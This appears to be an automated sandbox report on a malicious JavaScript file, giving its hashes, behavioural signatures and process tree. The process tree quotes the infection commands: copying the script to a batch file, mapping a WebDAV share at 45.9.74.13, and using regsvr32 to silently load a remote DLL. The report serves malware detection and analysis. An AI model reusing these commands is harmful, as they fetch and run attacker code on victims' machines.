Analysis
- max time kernel: 120s
- max time network: 122s
- platform: windows7_x64
- resource: win7-20240704-en
- resource tags: arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
- submitted: 09/07/2024, 07:34
Tasks
- Static task: static1
- Behavioral task: behavioral1
  Sample: 2707398642559127343.js
  Resource: win7-20240704-en
- Behavioral task: behavioral2
  Sample: 2707398642559127343.js
  Resource: win10v2004-20240704-en
General
- Target: 2707398642559127343.js
- Size: 5KB
- MD5: c8c6f2cd727679d66031250fadadb58c
- SHA1: 4ce051b3bd77b04cdd56042825bdea493b53c537
- SHA256: 1b63022777404a40a968a35a13e1aec846789051a4e1dfa204d40b8d637f1707
- SHA512: ded49cf5c61c60d6ee3d1a26b6ba0b104e03fa11fc8680bc54f9f28641f3f07061a2375a0091685a1cb851b616d2ed8207581f39a3439ab0acee98481443354b
- SSDEEP: 96:Ickum+YFbacAUVwfk0PmZBvZfDJxgb5JbJCrWrkje:Ickwfk0PAvZfDJxgb5JbJCSrkje
Malware Config
Signatures
- Command and Scripting Interpreter: JavaScript (1 TTP)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Runs net.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  pid   Process
  2828  regsvr32.exe
- Suspicious use of WriteProcessMemory (11 IoCs)
  description                        pid   Process      procid_target
  PID 2380 wrote to memory of 536    2380  wscript.exe  30
  PID 2380 wrote to memory of 536    2380  wscript.exe  30
  PID 2380 wrote to memory of 536    2380  wscript.exe  30
  PID 536 wrote to memory of 2868    536   cmd.exe      32
  PID 536 wrote to memory of 2868    536   cmd.exe      32
  PID 536 wrote to memory of 2868    536   cmd.exe      32
  PID 536 wrote to memory of 2828    536   cmd.exe      33
  PID 536 wrote to memory of 2828    536   cmd.exe      33
  PID 536 wrote to memory of 2828    536   cmd.exe      33
  PID 536 wrote to memory of 2828    536   cmd.exe      33
  PID 536 wrote to memory of 2828    536   cmd.exe      33
Processes
- C:\Windows\system32\wscript.exe
  Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\2707398642559127343.js
  PID: 2380
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\2707398642559127343.js" "C:\Users\Admin\\quiesb.bat" && "C:\Users\Admin\\quiesb.bat"
    PID: 536
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net.exe
      Command line: net use \\45.9.74.13@8888\DavWWWRoot\
      PID: 2868
    - C:\Windows\system32\regsvr32.exe
      Command line: regsvr32 /s \\45.9.74.13@8888\DavWWWRoot\965.dll
      PID: 2828
      Signatures: Suspicious behavior: CmdExeWriteProcessMemorySpam
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 5KB
  MD5: c8c6f2cd727679d66031250fadadb58c
  SHA1: 4ce051b3bd77b04cdd56042825bdea493b53c537
  SHA256: 1b63022777404a40a968a35a13e1aec846789051a4e1dfa204d40b8d637f1707
  SHA512: ded49cf5c61c60d6ee3d1a26b6ba0b104e03fa11fc8680bc54f9f28641f3f07061a2375a0091685a1cb851b616d2ed8207581f39a3439ab0acee98481443354b